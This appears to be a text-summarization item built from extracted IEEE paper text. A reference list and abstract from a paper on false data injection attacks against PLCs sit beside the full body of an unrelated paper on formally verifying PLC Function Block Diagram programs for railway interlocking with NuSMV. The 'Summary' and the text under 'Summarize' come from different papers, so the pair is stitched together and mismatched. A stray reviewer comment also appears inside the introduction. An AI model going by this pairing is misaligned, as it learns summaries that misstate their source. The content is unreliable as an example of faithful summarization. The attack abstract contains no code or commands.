Rogers, Q. Wang, H. Khurana, K. Nahrstedt, and T. J. Overbye. Detecting false data injection attacks on DC state estimation. In Workshop on Secure Control Systems , Apr 2010. [6] Computer Emergency Response Team. ADV ANTECH/BROADWIN WEBACCESS RPC VULNERABILITY. ICS-CERT Advisory 11-094-02, April 2011. [7] L. Constantin. Researchers Expose Flaws in Popular Industrial Control Systems. http://www.pcworld.com, January 2012. [8] C. Courcoubetis, M. V ardi, P . Wolper, and M. Y annakakis. Memory- ef cient algorithms for the veri cation of temporal properties. F orm. Methods Syst. Des. , 1(2-3):275 288, Oct. 1992. [9] G. Dan and H. Sandberg. Stealth attacks and protection schemes for state estimators in power systems. In Proc. of IEEE SmartGridComm , 2010. [10] M. B. Dwyer, G. S. Avrunin, and J. C. Corbett. Patterns in property speci cations for nite-state veri cation. In Proceedings of the 21st international conference on Software engineering , ICSE 99, pages 411 420, 1999.[11] Eireann P . Levertt. Quantitatively Assessing and Visualising Industrial System Attack Surfaces. Master s thesis, University of Cambridge,2011. [12] N. Falliere, L. O. Murchu, and E. Chien. W32.Stuxnet Dossier. Technical report, Symantic Security Response, Oct. 2010. [13] N. Falliere, L. O. Murchu, and E. Chien. W32.Stuxnet Dossier. http: //www.symantec.com/connect/blogs/w32stuxnet-dossier, 2010. [14] R. Gerth, D. Peled, M. Y . V ardi, and P . Wolper. Simple on-the- y automatic veri cation of linear temporal logic. In Proceedings of the Fifteenth IFIP WG6.1 International Symposium on Protocol Speci cation, Testing and V eri cation XV , pages 3 18, London, UK, UK, 1996. Chapman & Hall, Ltd. [15] S. Ghosh, D. Elenius, W. Li, P . Lincoln, N. Shankar, and W. Steiner. Automatically extracting requirements speci cations from natural lan- guage. arXiv preprint arXiv:1403.3142 , 2014. [16] A. Giani, E. Bitar, M. Garcia, M. McQueen, P . Khargonekar, and K. Poolla. Smart grid data integrity attacks: characterizations and countermeasures;. In IEEE International Conference on Smart Grid Communications , pages 232 237, 2011. [17] J. E. Hopcroft. An n log n algorithm for minimizing states in a nite automaton. Technical report, Stanford, CA, USA, 1971. [18] L. Jia, R. J. Thomas, and L. Tong. Impacts of malicious data on real- time price of electricity market operations. In HICSS , pages 1907 1914, 2012. [19] O. Kosut, L. Jia, R. J. Thomas, and L. Tong. Malicious data attacks on smart grid state estimation: Attack strategies and countermeasures. In IEEE International Conference on Smart Grid Communications , pages 220 225, 2010. [20] Y . Liu, P . Ning, and M. K. Reiter. False data injection attacks against state estimation in electric power grids. ACM Trans. Inf. Syst. Secur . , 14:13:1 13:33, 2011. [21] S. McLaughlin, S. Zonouz, D. Pohly, and P . McDaniel. A trusted safety veri er for process controller code. In Proceedings ISOC Network and Distributed Systems Security Symposium (NDSS) , 2014. [22] Y . Mo and B. Sinopoli. False data injection attacks in control systems. InProceedings of the First Workshop on Secure Control Systems (SCS) , 2010. [23] C. NERC. Standards as approved by the nerc board of trustees may 2006. [24] D. G. Peterson. Project Basecamp at S4. http://www.digitalbond.com/ 2012/01/19/project-basecamp-at-s4/, January 2012. [25] A. Pnueli. The Temporal Logic of Programs. In Proceedings of the 18th Annual Symposium on F oundations of Computer Science , pages 46 57. IEEE Computer Society, 1977. [26] A. Teixeira, henrik Sandberg, G. Dan, and K.-H. Johansson. Optimal power ow: Closing the loop over corrupted data. In Proc. of American Control Conference , 2012. [27] M. Y . V ardi. An automata-theoretic approach to linear temporal logic. InProceedings of the VIII Banff Higher order workshop conference on Logics for concurrency : structure versus automata: structure versus automata , pages 238 266, Secaucus, NJ, USA, 1996. Springer-V erlag New Y ork, Inc. [28] L. Xie, Y . Mo, and B. Sinopoli. Integrity data attacks in power market operations. IEEE Trans. Smart Grid , 2(4):659 666, 2011. [29] T. Y ardley. SCADA: Issues, Vulnerabilities, and Future Directions. ;login , 34(6):14 20, December 2008. [30] S. Zonouz, K. Rogers, R. Berthier, R. Bobba, W. Sanders, and T. Overbye. Scpse: Security-oriented cyber-physical state estimationfor power grid critical infrastructures. IEEE Transactions on Smart Grid , 3(4):1790 1799, 2012.2014 IEEE International Conference on Smart Grid Communications 853Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:48 UTC from IEEE Xplore. Restrictions apply.
Summary:
Control systems rely on accurate sensor measure- ments to safely regulate physical processes. In False Data In- jection (FDI) attacks, adversaries inject forged sensor measure- ments into a control system in hopes of misguiding control algorithms into taking dangerous actions. Traditional FDI attacks mostly require adversaries to know the full system topology, i.e., hundreds or thousands of lines and buses, while having unpredictable consequences. In this paper , we present a new class of FDI attacks directly against individual Programmable Logic Controllers (PLCs), which are ubiquitous in power generationand distribution. Our attack allows the adversary to have only partial information about the victim subsystem, and produces a predictable malicious result. Our attack tool analyzes an I/O trace of the compromised PLCs to produce a set of inputs to achieve the desired PLC outputs, i.e., the system behavior . It proceeds in two steps. First, our tool constructs a model of the PLC s internal logic from the I/O traces. Second, it searches for a set of inputs that cause the model to calculate the desired malicious behavior . We evaluate our tool against a set of representative control systems and show that it is a practical threat against insecure sensor con gurations.
|
Summarize:
Keywords -formal veri cation; model checking; PLC; FBD; IEC 61131-3; I. I NTRODUCTION Programmable Logic Controllers (PLCs) are a special type of computer used in automation systems [1]. Generally speaking, they are based on sensors and actuators which have the ability to control, monitor and interact with a par- ticular process or a collection of processes. These processes are diverse and can be found, for example, in household appliances, emergency shutdown systems for nuclear power stations, chemical process control and rail automation sys- tems. IEC is an organization that provides international stan- dards for electrical, electronic and related technologies. The standard IEC 61131-3 [2] describes inter alia PLC program- ming languages. There are ve PLC languages proposed in the standard. Two of them are textual languages: (a) IL - Instruction List, and (b) ST - Structured Text. The other three programming languages are graphical languages: (c) FBD - Function Block Diagram, (d) LD - Ladder Diagram and (e) SFC - Sequential Function Chart. In this paper, the application and veri cation of PLCs in the rail automation domain is considered. One area of apply- ing PLCs in this domain is the area of electronic interlocking systems based on PLCs. Generally, electronic interlockings are used to control signals, points, line crossovers and level crossings, thereby ensuring safe operation. The most ofthe interlocking software has been written in the graphical language FBD. The goal of our work is to investigate the veri cation of FBDs. In the past years, there has been an increasing interest in analyzing PLC applications with formal methods. The low- level language IL has been the most investigated language in terms of PLC veri cation. Hence, rst attempts to verify FBDs are made by verifying the IL representation of an FBD program. Let us brie y describe some of the approaches for IL veri cation. In [3], timed automata are used to model IL programs. For veri cation, the model checker UPPAAL is used. Function and function block calls are not implemented. [4] proposes Petri nets and SMV for model checking IL programs. As data structures, anything can be used that can be coded with 8-bits. Another method that proposes veri cation with SMV is sketched in [5]. Time and timers are not part of the model in this work. Comparing the existing IL veri cation techniques and analyzing the properties of the software to be veri ed, we took the latter method as a starting point. The theory behind our improvement of the technique was described in [6]. The tool that automates the process was published in [7]. This way, we managed to make the automation of model checking of IL format of interlocking software fully automatic. The goal of [6] and [7] was to apply another method to the interlocking software described in this work. Unfortunately, the models became so complex that just small parts of the software could be veri ed. In the second phase of the project, in order to verify existing industrial software and not just parts of it, the veri cation of FBD programs has been suggested. The main idea of the technique can be found in [8]. In this paper, we formalize and automate this method. what is the novelty here over the papers cited? textFBD!tFBD with dramatic improvements? In the last years, other work on FBD veri cation has been published ([9] and [10]). These papers do not offer enough detail to enable comparison with our work. The paper is organized as follows. Section 2 brie y reviews the PLC structure and PLC programming languages. The theoretical background of the method for FBD veri ca- tion is described in Section 3. There we introduce the textual representation of FBD. Section 4 contains a case study which 2010 Third International Conference on Software Testing, Verification and Validation 978-0-7695-3990-4/10 $26.00 2010 IEEE DOI 10.1109/ICST.2010.10439 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. Input moduleOutput moduleCPUFigure 1. PLC organization illustrates the application area for the work presented here. The automation of the veri cation method is described in Section 5. Finally, the last section draws conclusions and indicates plans for future work. II. P ROGRAMMABLE LOGIC CONTROLLERS As already mentioned, PLCs are a special type of com- puter based on sensors and actuators able to control, monitor and in uence a particular process. In this section, the PLC structure and programming languages are described. A. PLC Structure A typical PLC organization is represented in Fig. 1. Input and output modules are used to transmit data between PLC and connected peripherals. The CPU is a part of a programmable controller responsible for reading inputs, executing the control program, and updating outputs. The focus of a PLC is to repeat periodically the execution of a control program. There are three main phases of this cyclic behavior of a PLC: read data from inputs (sensors), execute the control program, and write data to outputs (actuators). B. PLC Programming languages The program organization units proposed in IEC 61131-3 can be delivered by the manufacturer or programmed by the user according to the rules de ned in this standard. In this work, the software Step7 is used. This is the current software version for programming the PLC family SIMATIC S7 of the manufacturer Siemens AG [11]. The FBD programming language [12] is a restricted graphical representation of the machine-orientated language IL. This means that not all IL programs can be represented in FBD, but on the other hand each FBD program can be mapped to IL. FBD programs are similar to circuit diagrams in electrical engineering and consist of simple elements. For example, in Fig. 3 the following elements can be found. CMP ==I(comparison of two integers), &(conjunction of two Booleans), >=1(disjunction of two Booleans), and = (assignment of a value to a variable). III. T HEORETICAL BACKGROUND With processors getting more and more powerful, and memories growing bigger and bigger, veri cation becomes feasible for more and more complex programs. The veri - cation methods at hand, in particular model checking, turn out to work quite well for our application area. As a tool, we use NuSMV (a New Symbolic Model Veri er). NuSMVwas developed by IRST (Instituto per la Ricerca Scienti ca e Tecnologica) and CMU (Carnegie Mellon University) [13]. It is a reimplementation and extension of SMV , the rst model checker based on BDD. There is no standardized process yet to verify PLC. In this section, we present a veri cation process for PLC software written in FBD. There are essentially three steps: A. in order to make FBD programs processable by NuSMV , graphical FBD programs are translated into textual textFBD programs; B. connections between two graphical FBD elements are represented in the textFBD le by a special type of variables - circuit variables . In order to avoid circuit variables in the NuSMV state space, textFBD programs are translated into tFBD programs; C. a tFBD program can then be easily represented by a NuSMV program. In Fig. 3, the process is shown by means of an example which we will also use later on. A. From FBD to textFBD We present the FBD components and their corresponding textFBD statements along with their informal semantics. Then we indicate their formal operational semantics and mention how isomorphism of FBD and textFBD semantics can be proved, referring to [14] for the details. 1) FBD and textFBD syntax: In the textFBD format of an FBD program, each graphical FBD operator is given a textual representation. We give an overview of the FBD elements and their representations in textFBD. Bit operations Logical AND, OR andExclusive-OR operations are represented in textFBD by Out= (In1In2)where= & orjorXOR The AND and ORoperations may have more than two inputs, giving rise to corresponding textFBD constructs like Out= ((In1&In2) &:::&In n) The instruction negate binary input negates the input of an FBD operator In This is represented in textFBD by !In. The FBD assignment = InOperand is simply represented by operand =In. Among the bit operations, there are also reset output (R) andset output (S). S InOperand R InOperand 440 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. FBD ILprogram ( format) Modelising NuSMV model Model Checking satisfiednot satisfied + counterexampleCreate formattextFBD textFBD format Create model NuSMVList of Op. with local variables Substitution tFBD formatVariable descriptionCTL specificationTable of testcasesInterface description FormalisationFigure 2. Model checking FBD programs If the input value of the Roperator is true, then the operand is set to false . If the input value is false, then the operand is unchanged. As for the operator S, the operand is set only if its input value is true. A more precise semantics of the operators is given in [14]. Here we focus on their syntax. The operators are represented in textFBD by R(Operand;In);S(Operand;In) By means of the Noperator negative edge detection 1 !0, the signal state at the input is compared with that in the operand ( the edge memory bit ). If the input is false and the operand has stored true in the previous cycle, then a negative edge is recognized. In this case, the output is set totrue, and to false otherwise. The other way around, the P operator positive edge detection 0 !1recognizes a raising edge . These operators P InOperand N InOperand Out Out are represented in textFBD by Out=N(Operand;In);Out=P(Operand;In) Comparators For comparing two input values, the following comparison operators may be used: equal ( ==), unequal(<>), greater (>), greater or equal ( >=), less (<), less or equal ( <=). For instance, the operator CMP==IIn1 In2 Out which tests whether two inputs are equal, is represented in textFBD by Out= (In1==In2). Jumps Jump operations can be separated into con- ditional jumps and absolute jumps. Depending on the input value true orfalse , a conditional jump can be expressed by JMP orJMPN , respectively. The effect is to set the programcounter to the position marked by Label if the Incondition is true (JMP ) or the Incondition is false (JMPN ), respectively. JMPN InLabel JMP InLabel In textFBD, this is represented by JMP(In;Label );JMPN (In;Label ) An absolute jump corresponds with a goto statement and is simply represented by JMP(true;Label ). Integer math instructions Addition, subtraction or multiplication of two integers is represented in textFBD by !(Out;In1;In2)where!=ADD IorSUB IorMUL I: Move The MOVE operator copies the value at the input to the output: Out=In. For generating the textFBD le, the concept of a circuit variable is very important. These variables are generated when connections between two operands are to be repre- sented. The circuit variables are marked as Livariables (cf. g. 3). Fig. 3 gives an impression of the translation from FBD to textFBD. 2) FBD and textFBD semantics: Leth:FBD!textFBD be a map mapping each FBD element eto its corresponding textFBD representation a=h(e). The order of executing FBD operators in a network is determined by a mapping next: 2FBD!FBD determining which element is executed next, depending on the set of elements already executed. In textFBD, this role is taken by the program counter which can be de ned as a mapping p: textFBD!IN, mapping each statement ato its line number pcin the program. 441 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. _L1 = (int1 == 20); _L2 = ((bool1 & bool2) & _L1); _L3 = (bool3 & bool4); _L4 = (_L2 | L3); result1 = _L4; result2 = _L4;textFBD result1 = ; result2 =(((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)) (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));tFBD MODULE main VAR pc : 1..2; zyklus : 1..3; result1 : boolean; result2 : boolean; DEFINE MAX_pc := 2; MAX_zyklus := 3; bool1 := true; bool2 := true; bool3 := false; bool4 := true; int1 := 20; ASSIGN init(pc) := 1; init(zyklus) := 1; init(result1) := false; init(result2) := false;NuSMV next(result1) := case pc = 1 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result1; esac; next(result2) := case pc = 2 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result2; esac; next(zyklus) := case pc=2: case (zyklus+1) <= MAX_zyklus : zyklus+1; 1 :zyklus; esac; 1 : zyklus; esac; next(pc) := case pc+1 <= MAX_pc : pc+1; pc=2 : 1; 1 : pc; esac;& int1CMP ==I 20 bool1 bool2 & bool3 bool4>=1 =result1 =result2FBD ~ ~Figure 3. From FBD to NuSMV An FBD network Nmay be given a transition system T= (C;c0;!)as operational semantics, where Cis the set of FBD con gurations of N,c0is the start con guration, and!is the next-con guration relationship. An FBD con- guration is a triple c= (;e;E )whereis a state of the program variables, eis the element in the network Nto be executed next, and Eis the set of component elements in Nnot yet executed. Correspondingly, a textFBD program Pmay be given a transition systemS= (D;d0;,!)as operational semantics, whereSis the set of textFBD con gurations, d0is the start con guration, and ,!is the next-con guration relationship. A textFBD con guration is a triple d= (;a;pc )where is as above, ais the textFBD statement to be executed next,andpcis the program line in which ais. For the details of how these transition systems are de ned, we refer to [14]. There it is also shown that there is a bijective mapping h:C ! D with the property that h(c0) =d0andc!c0,h(c),!h(c0). Thus, an FBD network and its corresponding textFBD program have isomorphic operational semantics, so they are equivalent in a strong sense. B. From textFBD to tFBD The new tFBD format has the advantage that some circuit variables are avoided, thus reducing the state space for model checking dramatically. A textFBD line in which a new circuit variable is created may be omitted in tFBD under certain circumstances. Then, in each other line of the 442 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ... tFBD textFBD x = (x , ..., x ), x - Variable; _L = (_L , ..., _L ); f(x) = (f , ..., f )(x);1 n i 1 j-1 1 j-1 j+1 k-1 g(x) = (f , ..., f )(x)_L = (_L , ..., _L ); j+1 k-1d= ( , 1 1 _L = f (x), p+1)1 1 ... d= (i i _L = f (x), p+i)i i , d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, ... d = ( ,k op (x, _L ) p+k)2 k,d = (1 1(x, f(x)), p +1) , op1 d = (2 op (x, g(x)), p +2)2 ,2 d= (j op (x, _L), p+j)1 j, d= (k-1 _L = f (x), p+k-1)k-1 k-1 k-1,d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, d= (j+1 _L = f (x), p+j+1)j+1 j+1 j+1,Figure 4. Substitution of circuit variables textFBD program where this circuit variable is used, it may be substituted by the corresponding expression. The process is illustrated in Fig. 3. To be more precise, textFBD programs are transformed to tFBD programs in the following way: each textFBD assignment Li=fi(x)of an expression fi(x), wherexis a sequence of arguments, to a circuit variable Liis omitted. Instead, each occurrence of Liin righthand sides of other textFBD statements is substituted by fi(x). Similar to a textFBD program, a tFBD program can be given an operational semantics in the form of a transition systemS0= (D0;d0 0;,!0)whereD0is the set of con gura- tions,d0 0is the start state, and ,!0is the next-state transition function. We refer to [14] for details. The behaviour of textFBD and tFBD transition systems with respect to circuit variables is illustrated in Fig. 4. Clearly, since variables are eliminated, there can be no bijection between the state spaces and thus no isomorphism. Reducing the state space was precisely the motivation for introducing the transformation of textFBD to tFBD. But still, the operational semantics of textFBD and tFBD can be equivalent, albeit in the weaker sense of obser- vational equivalence: they can be strongly bisimilar. LetS= (D;d0;,!)be a textFBD transition system and S0= (D0;d0 0;,!0)the corresponding tFBD transition system. S andS0are strongly bisimilar, ( S S0), iff there is a relationship BDD0which is a strong bismulation for (d0;d0 0). That means: (d0;d0 0)2Band for all (d;d0)2B we have d,!g2D)9g02D0withd0,!0g0and(g;g0)2B d0,!0g02D0)9g2D withd,!gand(g;g0)2B Fig. 4 shows system states before and after using circuit variables, (1or0 1), respectively, and ( j, or0 2, orkor. 0 3), respectively. The following example shows that there is a problem. Example 1. (Comparing FBD, textFBD and tFBD) Letxandybe two Boolean variables which are combined by conjunction. If the result is true, thenxis set to false by theRoperator. The same happens with y. Ifxandy aretrue in the beginning, tFBD does not yield the expected result (cf. Fig. 5). textFBD FBD tFBDx true truey 0: & yxR Rx y_L1 = x y; R(x, _L1);& R(y, _L1);R(x, ( )); x y R(y, (x y));& & x false falsey 3:x false falsey 3:x false truey 2: Figure 5. Example: FBD, textFBD and tFBD synopsis The problem is solved by restricting the use of variables appropriately, forbidding situations where a circuit variable may not be substituted: 1) if an operator with local variables is to be assigned to the circuit variable; 2) if the circuit variable is used as an operand in an operator with local variables. With this restriction, strong bisimilarity between the textFBD and tFBD operational semantics can be shown [14]. Example 2. (Strong bisimulation) Strong bisimulation for the example in Fig. 4 works as follows. B=f(d1;d0 1);:::; (di;d0 1);:::; (dj 1;d0 1);(dj;d0 1); (dj+1;d0 2);:::; (dk 1;d0 2);(dk;d0 2)g C. From tFBD to NuSMV The main program is shown in MODULE main (cf. Fig. 3). The module may have several sections. For our FBD modeling, the VAR,DEFINE ,ASSIGN andSPEC sections are used: the VAR section for variable declarations; theDEFINE section for de ning symbols for frequently used expressions; the ASSIGN section for describing assignments, 443 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. and the SPEC section for specifying CTL speci cations to be checked in the model. For an example, cf. Fig. 3. For more detail, cf. [14]. A possible program property to be checked may look like this: at the end of the rst cycle, the variables x1;:::;x n should have values a1;:::;a n . Speci cations for a NuSMV model can be written in CTL (Computation Tree Logic), LTL (Linear Time Logic) or PSL (Property Speci cation Language). For example, for specifying the above property in CTL, we have to write CTLSPEC in front of the formula. The property given above then looks as follows. CTLSPEC AG((cycle = 1 & pc = MAX PC)) ((x1 = a1 )& . . . & (xn = an ))) Where the program cycle is determined by the integer variablecycle . A more extended case study is given in the next section. The NuSMV user has the choice between a modular or a atrepresentation of functions. In modular representation, each function is given a separate module. The advantage is that modeling of FBD programs is rather straightforward. The disadvantage is that with each instantiation of a module, the state space grows very rapidly. In at representation, all functions are speci ed in one module so that the state space remains constant when running the model checker. Indeed, this can be quite ef cient. The disadvantage is that the functions have to be (re)modeled by hand, an effort that may only by feasible for small systems. Summing up, the process given above gives isomorphic transformations in the rst two steps, and a strongly bisimilar transformation in the third step. This way, model checking PLC software written in FBD becomes feasible in practice. This is demonstrated in the next section. IV. C ASE STUDY Here we describe how the method is applied in the area of railway automation. We concentrate on FBD software as it is used by one family of PLC-based interlocking systems. Interlocking systems are railway facilities which are used for the central control of points and signals (cf. [15]). They have outdoor and indoor parts. The indoor parts consist of hardware and software. The interlocking software is composed of several com- ponents which are responsible for controlling the various interlocking functions. One such component is a point. Like the other components, it consists of several code modules. These code modules depend on the equipment, but each one is designed for only one point. One function block diagram in such a code module of a point component is responsible for controlling the point. This function block diagram is used here as a use case for demonstrating the veri cation method proposed in this paper. From this module, the corresponding NuSMV model is created using our method. The model is presented below.Description Precondition Expected reaction From a right position, the left direction relays is activated by means of a reposition command, and the reposition pro- cess is activatedModuleIF =Right , ComIF =ReposComModuleIF =Left+S1 After at least 20 ms, the position relays is acti- vated=>,iTime = 20 ModuleIF =S2 After at least 30 ms, protection is activated=>,iTime = 30 ModuleIF =S3 After at least 40 ms, the frog is started to move=>,iTime = 40 ModuleIF =S4 Table I EXAMPLE OF A TEST CASE :MOVING THE FROG OF A POINT LEFT We start with describing the test cases, taken from practice, which are used for checking correctness of the software. The test cases form the basis for constructing the veri cation scenarios. A. Test case description In table I we give a simpli ed description of a test case of the code module for point control. The activation of the point actuator component is checked in four steps before moving the point blade. Each step is represented by a description, a de nition of preconditions (start con guration of the test case), and a de nition of the expected reaction. For better understanding table I, we explain the concept of a variable domain in more detail. In the description of preconditions and expected reactions of a test case, we not only use program variables like iTime , but also variable do- mains like ModuleIF orComIF . A variable domain contains a description of several program variables. This can be better explained using the variable domain ModuleIF as an example. It is de ned in table II. The following variables belong to this domain: bPointPosition, bDirectionRight, bDirectionLeft, bRepetition, bRepositionActive, bPointPositionRelays, bProtection and iTime . If ModuleIF has the value Right , then bPointPosition =1, bDirectionRight =1 and bDirectionLeft =0. Variable domains are used in the description of inter- faces. As shown in table II, the module interface is de- scribed by the variable domain ModuleIF and the variables bPointPosition ,bDirectionRight ,bDirectionLeft , etc. A vari- able domain contains different variable assignments in dif- ferent test cases. In order to enable a clear test case descrip- tion, all variable assignments are listed for each variable do- main. For example, the variable assignments for ModuleIF is de ned by ModuleIF2fLeft, Right, S1, S2, S3, S4, :::g. Thus, the precondition in the rst step of the test case is represented by ModuleIF=Right expressing that the direction relays should be in the right position. This 444 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ModuleIF - Module Interface Left Right S1 S2 S3 S4 bPointPosition 0 1 bDirectionRight 0 1 bDirectionLeft 1 0 bRepetition 1 0 bRepositionActive 1 bPointPositionRelays 1 0 bProtection 1 0 iTime 0 ComIF - Command Interface ReposCom bComActive 1 bFunction 1 iElement 100 Table II DEFINITION OF INTERFACES - VARIABLE DOMAINS means that, before executing the test case, we must have bPointPosition =1,bDirectionRight =1 and bDirectionLeft =0 (cf. table II). Similarly, at the beginning of the test case, ComIF is de ned as ReposCom . If an interface is not speci ed in the precondition of a test case, it assumes its initial value which should be de ned at the beginning of the test table. When describing the preconditions of the 2nd, 3rd and 4th step of the test case, we have the symbol combination => . This means that the test case is based on the previous step. For instance, in the 2nd step, all variables except for iTime have their values from the expected outcome of the 1st step. The latter is described by ModuleIF=Left+S1 . That means thatbPointPosition =0,bDirectionRight =0,bDirectionLeft =1, bRepetition =1 and bPositionActive =1. When adding two or more variables of a variable domain symbolically, it is possible that a variable occurs in the description of both (or all) elements of the sum. In this case, the variable is to be assigned the value of the last occurrence. For instance, bPointPosition is given the value 1 in Left+Right . When describing the preconditions of a test case, we may also assign values to single variables instead of value do- mains. For instance, the variable iTime is assigned different values in the 2nd, 3rd and 4th steps of the test case. The same holds when describing the expected reaction. B. NuSMV Component Model An extract of the NuSMV model of the point component is shown in table III. We show only lines from the tFBD model in which the following program variables change: bPointPosition, bDirectionRight, bDirectionLeft, bReposi- tionActive, bRepetition, bComActive, bFunction, iElement . These are the variables which are used in the speci cation. The variables having no role in our context are denoted by var1, var2, etc. in table III.In the model description as well as in the speci cation, the data are represented in a changed format in order to hide the reference to the original software. The rules for transforming FBD programs into the NuSMV input language are described above in section III. In this section, we show how to represent speci cations as logical formulae. C. Description of veri cation scenarios In the case study, veri cation scenarios are described in CTL. Two parameters are important: 1) the program counter pcwhich assumes the value MAX pcat the end of a program cycle, and is then set to 1 again; 2) the cycle counter cycle . As said before, the test case descriptions of the component serve as basis for formulating the veri cation scenarios. Since a test case is de ned by a precondition and an expected reaction, we may represent this by the following scenario. ModuleIF = Right & ComIF = ReposCom ) (1) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = Left + S1 ) Bearing in mind the interface description in table II, the rst step of the scenario may be represented by the following formula. ((bPointPosition = 1 & bDirectionRight = 1 & (2) bDirectionLeft = 0) & (bComActive = 1 & bFunction = 1 & iElement = 100 ))) AG( (cycle = 1 & pc = MAX pc)) (bPointPosition = 0 & bDirectionRight = 0 & bDirectionLeft = 1 & bRepetition = 1 & bRepositionActive = 1 )) The remaining three formulae are created in a similar way. As mentioned before, the symbol combination => says that the precondition of the current step has to be extended with the expected reaction of the previous step. For the 2nd step, we thus have (ModuleIF = Left + S1 & iTime = 20 )) (3) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = S2 ) Alternative representation of the speci cation: If only one formula is to be checked, we may take the variable assignments from the precondition and de ne their values as initial values of the model variables. Then a scenario may be described by the following formula AG( (cycle = 1 & pc = MAX pc)) (4) expected reaction ) With this approach, we build a slightly different NuSMV model where the set of initial states in the model is reduced. As an example, table III shows part of the model which refers to some of the variables of our accompanying test case. There the initial values of the variables bPointPosition, bDirectionRight andbDirectionLeft are de ned using the init clause. In contrast, the variables bComActive, bFunction and iElement are de ned in the DEFINE section because their values are unchanged in the model. 445 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. tFBD . . . 48 R(bRepositionActive, (var10 jvar11 jvar12));. . . 50 R(bRepositionActive, ((((var13 & !var14) & (var15 & !var16)) jvar17) jvar18));. . . 52 R(bRepositionActive, (var13 & !var14) & (var19 >var20));. . . 88 bPointPosition = var1;. . . 96 bRepositionActive = ((var21 & !var22) j((!var21 & !var23) jvar24));. . . 104 bDirectionRight = bPointPosition; 105 bDirectionLeft = !var2;. . . 120 S(bPointPosition, var2);. . . 122 S(bRepetition, var3); 123 R(bRepetition, ((var4 & !var5) j((var6 & !var7) & var8) j ((var7 & !var6) & var9)));. . . 131 R(bPointPosition, var2);. . . DEFINE bComActive := 1; bFunction := 1; iElement := 100; ASSIGN init(bPointPosition) := 1; next(bPointPosition) := case pc = 88 : var1; pc = 120 & var2 : 1; pc = 131 & var2 : 0; 1 : bPointPosition; esac; init(bDirectionRight) := 1; next(bDirectionRight) := case pc = 104 : bPointPosition; 1 : bDirectionRight; esac; init(bDirectionLeft) := 0; next(bDirectionLeft) := case pc = 105 : !var2; 1 : bDirectionLeft; esac; init(bRepetition) := 0; next(bRepetition) := case pc = 122 & var3 : 1; pc = 123 & ((var4 j!var5) j(((var6 & !var7) & var8) j((var7 & !var6) & var9))) : 0; 1 : bRepetition; esac; next(bRepositionActive) := case pc = 48 & (var10 jvar11 jvar12) : 0; pc = 50 & ((((var13 & !var14) & (var15 & !var16)) jvar17) j var18) : 0; pc = 52 & ((var13 & !var14) & (var19 >var20)) : 0; pc = 96 : ((var21 & !var22) j((!var21 & !var23) jvar24)); 1 : bRepositionActive; esac; Table III NUSMV MODEL OF THE POINT COMPONENTD. Veri cation results The textFBD format of the software component under consideration has 165 lines of code. It uses about 100 vari- ables (90 Boolean and 10 integer). The model veri cation was performed on an Intel(R) Xeon(R) CPU 5150 computer with 2,66 GHz and 3,25 GB RAM. A detailed description of the NuSMV model checker may be found in [16] and [17]. Its most important properties are summarized in [13]. The basic steps of NuSMV veri cation work as follows. 1) in the rst step, the model is read; an internal hierar- chic representation is set up and stored 2) in the second step, the hierarchic representation is transformed into a attened representation; it contains only one module in which all modules and processes are instantiated 3) then the BDD variables are generated 4) the attened model is represented using BDDs 5) after generating the BDD representation, the CTL speci cations can be checked The execution of the rst three steps took about 1 second. The execution times for the other two steps was different depending on which of the variants explained above was used. One model for all scenarios: Formulae (1), (2) and (3) describe how the speci cation for the rst variant of the NuSMV model is constructed. The initial values of the variables in question are not de ned in the model. From about 1065states, about 1014states were reachable. Setting up the BDD-based model took slightly more than half an hour. Checking the speci cations took 30 to 80 seconds per formula. One model for one scenario: In the second case, a model is generated for each scenario. The preconditions for the scenario are initialized in the model. The speci cation is given in the form of formula (4). In the NuSMV model, about 6000 of the 1060states were reachable. Setting up the BDD-based model took about 40 minutes. Checking the speci cation then took less than 1 second. V. A UTOMATION OF THE VERIFICATION METHOD As mentioned before, the CTL speci cation is set up using the descriptions of the test case and the module interfaces (cf. g. 2). CTL formulae are easily constructed by combining information from the tables, but this must be done by hand. Creating the NuSMV model, however, is a little more complicated, but it can be automated. With the method described here, an arbitrary FBD pro- gram is modeled in a way that makes it possible to verify it with the NuSMV model checker. As mentioned above in section III, we propose to rst construct the textFBD model, then the tFBD model, and then the NuSMV model. In what follows, we give a more detailed description of this process. 446 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. <N-Statement > ::= . . . j<Bitlogic > < BitlogicEnd > (1) <Bitlogic > ::= . . . jA<Operand > < End> (2) jA(<End> < Compare >)<End> (3) j<Bitlogic >A<Operand > < End> (4) j<Bitlogic >O<End> < Bitlogic > (5) <Compare > ::= L<Operand > < End>L<Operand > (6) <End>COMPARETOK <End> <BitlogicEnd > ::= . . . j<AssignEndN > (7) <AssignEndN > ::= =<Var> < End> < AssignEnd > (8) <AssignEnd > ::= j<AssignEnd >=<Var> < End> (9) Table IV EXCERPT OF THE GRAMMAR _L1 = (int1 == 20); _L2 = ((bool2 & bool1) & _L1); _L3 = (bool4 & bool3); _L4 = (_L3 | L2); result1 = _L4; result2 = _L4;A(; L int1; L 20; ==I; ); A bool1; A bool2; O; A bool3; A bool4; = result1; = 